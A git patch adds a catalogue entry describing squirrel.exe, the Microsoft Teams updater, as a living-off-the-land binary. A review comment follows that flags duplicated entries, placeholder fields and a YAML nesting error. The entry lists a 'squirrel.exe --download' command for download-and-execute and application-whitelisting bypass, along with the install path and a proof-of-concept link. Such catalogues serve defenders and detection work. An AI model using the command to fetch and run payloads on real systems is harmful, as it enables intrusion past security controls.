From c96d22b345ca60cfc9fbdb9142556816f4d9a829 Mon Sep 17 00:00:00 2001 From: jreegun Date: Thu, 27 Jun 2019 20:22:35 +0800 Subject: [PATCH] Create squirrel.yml --- yml/OtherMSBinaries/squirrel.yml | 47 ++++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 yml/OtherMSBinaries/squirrel.yml diff --git a/yml/OtherMSBinaries/squirrel.yml b/yml/OtherMSBinaries/squirrel.yml new file mode 100644 index 0000000..a653f3a --- /dev/null +++ b/yml/OtherMSBinaries/squirrel.yml 
@@ -0,0 +1,47 @@ +Name: squirrel.exe +Description: Binary to update the existing installed Nuget/squirrel package +Author: User +Created: Installed date +Commands: + - Command: squirrel.exe --download [url to package] + Description: The above binary will go that particular location and look for RELEASES file and download the nuget package. + Usecase: Download and execute binary + Category: Execute + Privileges: User Privilege + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows OS + - Command: squirrel.exe --download [url to package] + Description: The above binary will go that particular location and look for RELEASES file and download the nuget package. + Usecase: Download and execute binary + Category: AWL Bypass + Privileges: User Privilege + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 + - Command: squirrel.exe --download [url to package] + Description: The above binary will go that particular location and look for RELEASES file and download the nuget package. + Usecase: Download and execute binary + Category: Download + Privileges: User Privilege + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 +Full_Path: +- Path: NA +- Path: %localappdata%\Microsoft\Teams\current\Squirrel.exe +Code_Sample: +- Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel +Detection: +- IOC: NA +- IOC: NA +Resources: + - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls + - Link: https://twitter.com/reegun21/status/1144182772623269889 + - Link: NA + Acknowledgement: + - Person: Reegun J (OCBC Bank) + Handle: @reegun21 + - Person: NA + Handle: NA +---
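Review bot: the three `- Command:` entries in this hunk are byte-for-byte identical (same `squirrel.exe --download [url to package]`, same Description, same Usecase), differing only in `Category` (Execute, AWL Bypass, Download) and `OperatingSystem` (Windows OS vs Windows 10); either collapse them into one entry or make each description say what distinguishes that category, since a defender reading the Execute entry cannot tell from `look for RELEASES file and download the nuget package` what is executed or how the AWL bypass occurs. Several fields are placeholders rather than data and should be filled or dropped before merge: `Author: User`, `Created: Installed date`, the `- Path: NA` alongside the real `%localappdata%\Microsoft\Teams\current\Squirrel.exe`, both `- IOC: NA` lines under `Detection:` (no detection guidance at all for an entry tagged T1218), the `- Link: NA`, and the empty `- Person: NA` / `Handle: NA` pair. Also check the nesting of `Acknowledgement:`: it appears indented at the level of the `- Link:` items under `Resources:` rather than as a top-level key, which would not parse as the other entries in this directory do. Minor: `will go that particular location` should read `will go to that particular location`.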